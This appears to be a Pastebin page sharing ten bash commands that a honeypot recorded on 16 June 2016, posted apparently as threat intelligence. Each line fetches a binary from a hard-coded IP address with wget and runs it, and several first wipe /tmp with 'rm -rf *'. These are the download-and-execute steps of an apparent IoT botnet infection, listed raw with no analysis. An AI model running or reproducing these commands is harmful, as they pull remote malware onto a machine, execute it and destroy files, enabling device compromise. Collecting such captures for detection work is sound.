Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-06-16 19:18

Jun 16th, 2016
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.90 KB | None | 0 0
  1. cd /tmp;rm -rf *;wget http://208.89.211.21/Cgi/bin/x;cat x >busybox;chmod 777 busybox;./busybox
  2. cd /tmp;rm -rf *;wget http://208.89.211.21/Cgi/bin/y;cat y >busybox;chmod 777 busybox;./busybox
  3. cd /tmp;rm -rf *;wget http://208.89.211.21/Cgi/bin/d;cat d >busybox;chmod 777 busybox;./busybox
  4. cd /tmp;rm -rf *;wget http://208.89.211.21/Cgi/bin/i;cat i >busybox;chmod 777 busybox;./busybox
  5. cd /tmp;rm -rf *;wget http://208.89.211.21/Cgi/bin/k;cat k >busybox;chmod 777 busybox;./busybox
  6. cd /tmp; busybox wget http://208.89.211.21/Cgi/bin/x; chmod +x x; ./x; busybox rm -f x*
  7. cd /tmp; busybox wget http://208.89.211.21/Cgi/bin/y; chmod +x y; ./y; busybox rm -f y*
  8. cd /tmp; busybox wget http://208.89.211.21/Cgi/bin/d; chmod +x d; ./d; busybox rm -f d*
  9. cd /tmp; busybox wget http://208.89.211.21/Cgi/bin/i; chmod +x i; ./i; busybox rm -f i*
  10. cd /tmp; busybox wget http://208.89.211.21/Cgi/bin/k; chmod +x k; ./k; busybox rm -f k*
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement